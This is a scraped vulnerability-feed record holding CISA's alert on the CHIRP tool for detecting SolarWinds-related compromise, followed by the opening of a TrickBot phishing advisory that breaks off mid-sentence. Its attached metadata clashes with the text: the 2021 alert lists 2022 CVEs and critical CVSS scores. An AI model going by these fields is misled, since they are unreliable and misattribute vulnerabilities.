environment.\n\nIn this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment.\n\nCHIRP is freely available on the [CISA GitHub Repository](<https://github.com/cisagov>). For additional guidance watch CISA's [CHIRP Overview video](<https://www.youtube.com/watch?v=UGYSNiNOpds>). **Note:** CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.\n\nCISA advises organizations to use CHIRP to:\n\n * Examine Windows event logs for artifacts associated with this activity;\n * Examine Windows Registry for evidence of intrusion;\n * Query Windows network artifacts; and\n * Apply YARA rules to detect malware, backdoors, or implants.\n\nNetwork defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note**: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n#### How CHIRP Works\n\nCHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts [AA20-352A](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>) and [AA21-008A](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n\nCurrently, the tool looks for:\n\n * The presence of malware identified by security researchers as [TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>) and RAINDROP;\n * Credential dumping certificate pulls;\n * Certain persistence mechanisms identified as associated with this campaign;\n * System, network, and M365 enumeration; and\n * Known observable indicators of lateral movement.\n\nNetwork defenders can follow step-by-step instructions on the [CISA CHIRP GitHub repository](<https://github.com/cisagov/CHIRP>) to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.\n\n#### **Compatibility**\n\nCHIRP currently only scans Windows operating systems.\n\n#### **Instructions**\n\nCHIRP is available on CISA\u2019s GitHub repository in two forms:\n\n 1. A compiled executable\n\n 2. A python script\n\nCISA recommends using the compiled version to easily scan a system for APT activity. For instructions to run, read the README.md in the CHIRP GitHub repository.\n\nIf you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.\n\n### Mitigations\n\n#### Interpreting the Results\n\nCHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note:** Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\n#### **Frequently Asked Questions**\n\n 1. **What systems should CHIRP run on?**\n\nSystems running SolarWinds Orion or believed to be involved in any resulting lateral movement.\n\n 2. **What should I do with results?**\n\nIngest the JSON results into a SIEM system, web browser, or text editor.\n\n 3. **Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP?** \n\n 1. Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run.\n\n 2. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. CHIRP provides a complementary capability to Sparrow by scanning for on-premises systems for similar activity.\n\n 4. **How often should I run CHIRP?**\n\nCHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format.\n\n 5. **Do I need to configure the tool before I run it?**\n\nNo.\n\n 6. **Will CHIRP change or affect anything on the system(s) it runs on?**\n\nNo, CHIRP only scans the system(s) it runs on and makes no active changes.\n\n 7. **How long will it take to run CHIRP?**\n\nCHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.\n\n 8. **If I have questions, who do I contact? **\n\nFor general questions regarding CHIRP, please contact CISA via email at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov>) or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at <https://us-cert.cisa.gov/report>. For all technical issues or support for CHIRP, please submit issues at the [CISA CHIRP GitHub Repository](<https://github.com/cisagov/CHIRP>). \n\n### Revisions\n\nMarch 18, 2021: Initial Publication |April 9, 2021: Fixed PDF (not related to content)|April 15, 2021: Updated with Attribution Statement\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-15T12:00:00", "type": "ics", "title": "Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-04-15T12:00:00", "id": "AA21-077A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-077a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:17:32", "description": "### Summary\n\n_This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 8. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.\n\nTrickBot\u2014first identified in 2016\u2014is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.\n\nTo secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nTrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which\u2014if enabled\u2014execute malware (_Phishing:_ _Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>)], _Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>)]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. (_User Execution: Malicious Link_ [[T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>)], _User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>)]). In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically

Top 10 Routinely Exploited Vulnerabilities

Description

Related